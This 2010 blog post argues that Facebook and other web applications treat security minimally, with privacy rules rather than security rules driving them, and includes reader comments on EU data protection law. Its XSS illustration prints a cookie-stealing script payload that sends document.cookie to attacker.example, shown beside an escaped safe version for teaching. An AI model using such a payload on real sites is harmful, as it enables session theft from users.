Friday, May 21, 2010

Facebook and Security Minimalism

Facebook can't seem to catch a break. Just this Wednesday a cross-site request forgery (XSRF) bug was announced that gave access to birthdates users had designated as private.

Not that Facebook users care. I would bet dollars to proverbial donuts that no more than 0.01% of Facebook users have ever heard of XSRF. And more importantly, I would bet that almost none of them have really suffered from these vulnerabilities. Bad security in social networks is a non-story. Lax privacy policies, on the other hand, are much more in your face. No user is going to notice an insecure version of Python running on your webserver. But share their data with unauthorized contacts and the same user might go berserk.

User apathy notwithstanding, Facebook is making some half-hearted attempts to calm the masses. Last Thursday the company announced the ability to limit the devices from which an account can be accessed. But this attempt to soothe the pitchfork-wielding Facebook villagers is misdirected. Users are concerned about who Facebook is sharing their information with, not how. Device authentication - a poor man's security control at the best of times - is an unnecessary inconvenience to the vast majority of users and an insufficient security control for the truly paranoid.
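To see why this kind of device check is thin protection, here is a minimal sketch of what cookie-based device recognition typically boils down to. Every name and detail below is hypothetical; this is not Facebook's actual implementation.

```python
# Hypothetical sketch of cookie-based device recognition; not Facebook's code.
import hashlib
import hmac
import secrets

SERVER_SECRET = b"replace-with-a-real-secret-key"  # assumed server-side key


def issue_device_token(user_id: str) -> str:
    """Mint a token to store in a long-lived cookie on a newly approved device."""
    device_id = secrets.token_hex(16)
    sig = hmac.new(SERVER_SECRET, f"{user_id}:{device_id}".encode(), hashlib.sha256).hexdigest()
    return f"{device_id}.{sig}"


def is_known_device(user_id: str, token: str) -> bool:
    """Verify the cookie at login; clearing or stealing the cookie defeats the check."""
    try:
        device_id, sig = token.split(".")
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{user_id}:{device_id}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)
```

Anything that walks away with the cookie, or simply phishes the password and approves a new device, sails right past this control - which is why it soothes more than it secures.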

Facebook is no fool, of course. You don't build a business that engages every tenth adult on the planet without honing a pretty good sense for which way the wind is blowing. The company realizes that it is under no obligation to provide any real security controls to its users. Providing window-dressing security such as device authentication is a good way to appear conscientious to a public that tends to conflate security with privacy. And in any case, the risk that device authentication addresses - preventing User A from logging in as User B - is the one area where Facebook and its users have a common interest.

So Facebook's mission is not entirely at odds with security. Facebook has an interest in providing application security insofar as it does not impede its vision of becoming the web's authoritative social platform (more on that in a bit). But beyond that, why would Facebook provide security that involves substantial resources or limits its collaborative abilities? Facebook may throw its users a security bone when it comes on the cheap, but the company is under no obligation to provide anything beefier.

Really? Here is a simple fact most security folks won't like - unless you are in a regulated industry, you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions. Laws will limit who you can share data with, and in some cases - such as data collected from children - whether information can be collected to begin with. But they impose virtually no requirements on small businesses as to how, or even whether, they need to secure their data.

This means that anybody can fire up a web application and start collecting, storing, and processing data that may or may not be sensitive to its owner. And they can do this while being under almost no legal or business requirement to provide adequate security.

With hosting costs approaching zero and development frameworks hiding the uglier layers of the stack, this means that any old schmo can be in business in no time. Just like you can blog on Blogger without touching any code, you can now build some pretty impressive quasi-professional web apps without touching any real code. Millions of people have done exactly that.

But what about big apps? Surely the ubiquitous brand name web applications are subject to some sort of control that two guys in their garage are not? Well, not really. The fact is that many web 2.0 apps in common enterprise use are probably run by no more than 5 or 10 guys. They may look like big businesses, but the beauty of the Internet is the ability for small organizations to amplify their presence and take on the trappings of the big boys.

Today there are gazillions of sites out there - doing anything from storing files to reformatting reports - that operate with almost zero intentional application security. And it's not just small or medium-sized businesses. Even the big players are, at the end of the day, only subject to restrictions on who they can share data with. Having mostly evolved from small start-up operations, they take an understandably minimalist approach to information security. Application security - in stark contrast to privacy - is basically a good faith effort.

The kerfuffle around Google's recent StreetView-wifi snafu is a good example of the priority of privacy over security. Apparently Google's StreetView had collected information from open wifi networks. Google has attracted a great deal of negative press and is facing numerous investigations in Germany and elsewhere for this. At the same time, the numerous security vulnerabilities that are frequently exposed at most large companies hardly register on the legal radar screen, and are certainly not something that will get investigated. You don't trigger an EU investigation by having too many bugs to patch in a given release or by using a vulnerable version of PHP.

The More Social, The Less Secure

That's not to say that security and privacy are totally unrelated in social networks. If Facebook wants to build a platform that others can plug into, it necessarily opens the application up to vulnerabilities. A very good example of this is the recent hiccup with Yelp: Facebook's Instant Personalization exposed users to a cross-site scripting (XSS) vulnerability on Yelp that could harvest user data. Without the Yelp integration, this vulnerability would never have existed.
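To make the vulnerability class concrete, here is a minimal sketch - with hypothetical names, not Yelp's actual code - of how rendering untrusted data without escaping lets injected script read whatever the page can read, and how output encoding neutralizes it:

```python
# Minimal sketch of the XSS class described above; hypothetical names, not Yelp's code.
import html


def render_review_unsafe(review_text: str) -> str:
    # Vulnerable: untrusted text is interpolated straight into the page markup.
    return f"<div class='review'>{review_text}</div>"


def render_review_safe(review_text: str) -> str:
    # Escaping the untrusted value renders injected markup as inert text.
    return f"<div class='review'>{html.escape(review_text)}</div>"


# A payload of the data-harvesting variety: it ships the visitor's cookie offsite.
payload = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"

print(render_review_unsafe(payload))  # the script tag survives and would execute in a browser
print(render_review_safe(payload))    # angle brackets and quotes are escaped; nothing runs
```

The point is not that escaping is hard - it is that every new integration multiplies the places where someone can forget to do it.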

When it comes to social networks, there is no free security lunch. Collaborative services are by definition less secure. Facebook is meant to be collaborative and thus can never offer the same level of security as a more gated service. This is the same reason that Times Square cannot be secured in the same way an airport can. One is meant to be open and one is meant to be closed, or at least controlled. Although hundreds of security vendors may try to secure web 2.0 applications, robust security and social collaboration are ultimately opposing aims.

Of course there are numerous technological standards being built precisely to secure the web 2.0 world. The move from Basic Auth to OAuth (a transition that Twitter will be enforcing next month) is a good example. But from a business perspective, the raison d'être of most social applications is the collaboration, not the security. When web services communicate, there is generally only one level of authentication standing between the caller and the crown jewels. Unlike traditional applications, most web services require only one screw-up or misconfiguration to expose your data.
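As a rough illustration of that Basic Auth to OAuth transition, here is a sketch using the third-party requests and requests-oauthlib packages; the URL and every credential below are placeholders, not Twitter's actual endpoints or keys:

```python
# Sketch of the Basic Auth -> OAuth 1.0a shift; placeholder URL and credentials throughout.
import requests
from requests_oauthlib import OAuth1

API_URL = "https://api.example.com/1/statuses/home_timeline.json"  # placeholder endpoint

# Basic Auth: the raw username and password ride along with every request,
# so any third-party service you hand them to holds the keys to the whole account.
resp_basic = requests.get(API_URL, auth=("alice", "s3cret-password"))

# OAuth 1.0a: requests are signed with revocable, per-application tokens;
# the user's password never travels with the call.
oauth = OAuth1(
    client_key="consumer-key",              # issued to the application
    client_secret="consumer-secret",
    resource_owner_key="access-token",      # issued for this user
    resource_owner_secret="access-token-secret",
)
resp_oauth = requests.get(API_URL, auth=oauth)
```

Better plumbing, to be sure - but it is still a single signed request standing between a misconfigured partner and the data.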

Social Media vs the Enterprise

This single-line-of-defense approach that most web 2.0 applications take is sufficient for most individual personal data. Your Facebook settings may keep photos of you drinking at a keg party hidden from your work colleagues, but their accidental exposure is not such a big deal and is a risk most users are willing to assume. In our personal lives, there is no breach notification, limited personal financial liability, and a much lower expectation of due care. Even the recent mess-up exposing your friends' private chats on Facebook is probably met with a stuff-happens shrug by everyone not directly affected.

But enterprises should - in theory - be more cautious. Breaches can carry real costs, financial liability is more substantial, and there are often contractual obligations to provide security. Indeed, while there might be no affirmative legal obligation for application providers to provide security, customers may very well be prevented from using their services if security is insufficient. After all, most enterprises that deal in personal data are under some form of contractual obligation to reasonably protect that data.

Will this raise the bar for small providers of cloud services? Unlikely. As I have frequently ranted about in the past, in non-regulated industries these obligations usually refer to some dinosaur-like provisions about SSL and biometric readers at server room entrances. Unless a company is truly conscientious about applying the meaning of due and reasonable care, there are practically no legal or contractual security requirements to which web applications are subject. (This is of course not true of heavily regulated industries like finance, but most corporations are operating in much more loosely regulated spaces).

Many enterprises are driving full steam ahead with the integration of minimally secured third party web applications into the enterprise. The transition from walled-off silo to full member of the application ecosystem is well underway. We may not be in a Jericho-Forum world of perimeterless utopia, but we are in the awkward teenage state of integrating our IT environment with hundreds of smaller companies - through APIs, SDKs, and the like.

Much as in real life, digital hookups put enterprises at risk - you no longer have to worry just about who you are with, but about everyone they have been with and will be with in the future. And just as in real life, the process of evaluating the safety of a potential application hookup is largely heuristic. With an increasingly promiscuous digital environment, we lose the ability to do a full battery of tests on each potential partner (and belated apologies for the lame analogy).

For individuals, the risks of collaborative web services are far outweighed by the benefits. That's the reason that Facebook has 400 million users and why thousands of popular applications with only the thinnest veneer of authentication thrive. This risk calculus will also hold for many enterprises, both large and small. For more security heavy environments, however, fundamental changes will be needed. For some environments it will take a lot more than device authentication to make today's handy web applications ready for enterprise prime time.

4 comments:

  1. The blog entry states:
    "Here is a simple fact most security folks won't like - unless you are in a regulated industry you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions."

    I don't agree with that statement - or I have not understood it correctly.

    The European Union (EU) requires that anybody who processes personal data (including through websites) of EU citizens implement appropriate measures to protect this data. The painful details are below!

    Article 17 of the EU Data Protection Directive (95/46/EC) states:

    "Member States shall provide that the controller must implement appropriate technical and organizational measures to protect personal data against accidental or unlawful destruction or accidental loss, alteration, unauthorized disclosure or access, in particular where the processing involves the transmission of data over a network, and against all other unlawful forms of processing."

    EU countries have adopted this directive into their own national Data Protection legislation. So if somebody creates a website to process personal information in an EU country, they need to "implement appropriate technical and organizational measures to protect personal data". I certainly agree that the requirements are hopelessly vague - what does "appropriate" mean? However, any website that processes personal information belonging to EU citizens needs to comply with this Data Protection legislation. In fact, Facebook, Google etc. do agree to comply with the European Data Protection legislation in a roundabout way through the "Safe Harbor" program.

    Here are some links:

    EU Data Protection Directive (95/46/EC):
    http://eur-lex.europa.eu/Notice.do?val=307229:cs&lang=en&list=307229:cs,&pos=1&page=1&nbl=1&pgs=10&hwords=95/46/EC~&checktexte=checkbox&visu=#texte


    Safe Harbor Program:
    https://www.export.gov/safehrbr/list.aspx

    If you go to the Google entry at
    http://www.export.gov/safehrbr/companyinfo.aspx?id=8321
    you will see that Google answers Yes to the question "Do you agree to cooperate and comply with the European Data Protection Authorities?"

    Question 9 in the following document from the UK Information Commissioner mentions websites specifically:
    http://www.ico.gov.uk/upload/documents/library/data_protection/practical_application/collecting_personal_information_from_websites_v1.0.pdf

    Q:"We collect personal information through our website. Do we have to use an encryption-based transmission system?"

    A:"You are responsible for processing personal information securely. You must adopt appropriate technical and organisational measures to protect the information you collect."


    Alexis

  2. Thanks Alexis for the detailed and informative comment.

    The way I see it, the EU regulations and notices you cite in fact underscore the absence of even general technical legal requirements to secure applications. The only thing they seem to preclude is publicly posting personal information in a directly accessible way on a website, which no one would really do in practice anyhow. Almost all applications require some sort of authentication, however weak, for business reasons.

    The fact that the UK Information Commissioner document you cite does not, even in its FAQ, require SSL for personal information in transit shows just how non-committal this requirement for "appropriate measures" really is.

  3. You wrote: "For more security heavy environments, however, fundamental changes will be needed."

    In your view, what type of "fundamental changes" will be needed?

    Thanks,
    Doron.

  4. @Doron - A stated security policy is the first step. Most third party providers have privacy policies because they are required to. But most still do not have even a basic security policy describing what they do to address standard security issues - patching, secure development processes, internal access control, configurations, etc.

    Providers who until now have offered services either for free or for consumer-level prices (the $10/month type apps) have usually not prioritized - or in many cases even thought about - these issues. For them, forming a security narrative that is ready for regulated enterprises is more than just a documentation exercise. It really requires a 180 in a lot of processes.

